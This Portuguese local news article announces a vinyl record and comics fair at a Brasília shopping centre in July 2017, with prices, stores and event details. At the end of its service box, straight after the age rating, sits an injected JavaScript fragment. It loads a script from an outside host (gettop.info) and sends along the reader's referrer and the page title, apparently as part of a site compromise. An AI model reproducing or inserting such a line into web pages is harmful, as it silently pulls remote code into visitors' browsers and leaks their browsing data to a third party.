Feira expõe 5 mil discos de vinil no DF neste sábado

BSB Capital 14/07/2017 às 13:08, Atualizado em 18/09/2017 às 21:07

Discos custam a partir de R$ 10. Evento terá, ainda, histórias em quadrinhos e exposição de comics, mangás, quadrinhos brasileiros e fanzines

Cerca de 5 mil discos estarão expostos. Foto: Divulgação

O vinis vão invadir Brasília neste sábado (15). A 4ª edição da feira “Praça do Vinil” terá, além dos discos, histórias em quadrinhos e exposição de comics, mangás, quadrinhos brasileiros e fanzines.

O evento será realizado na praça de alimentação do Venâncio Shopping, na Asa Sul, das 10h às 19h. A entrada é gratuita. A feira ocorre a cada dois meses, sempre com uma atração especial. Desta vez, os quadrinhos foram escolhidos porque, segundo os organizadores, pertencem à mesma cultura escrita e urbana dos LPs.

Os colecionadores de vinil terão à disposição um acervo com cerca de 5 mil discos, disponibilizado por lojas como a de Marcondes, a Filial do Rock e Givaldo Discos. Apesar de 95% dos produtos serem usados, segundo os organizadores, alguns itens à venda são novos.

Serviço
Praça do Vinil
Data: 15 de julho
Local: Venâncio Shopping – SCS 8 lotes 50/60 – Asa Sul
Hora: de 10 às 19h
Entrada gratuita
Classificação livres.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima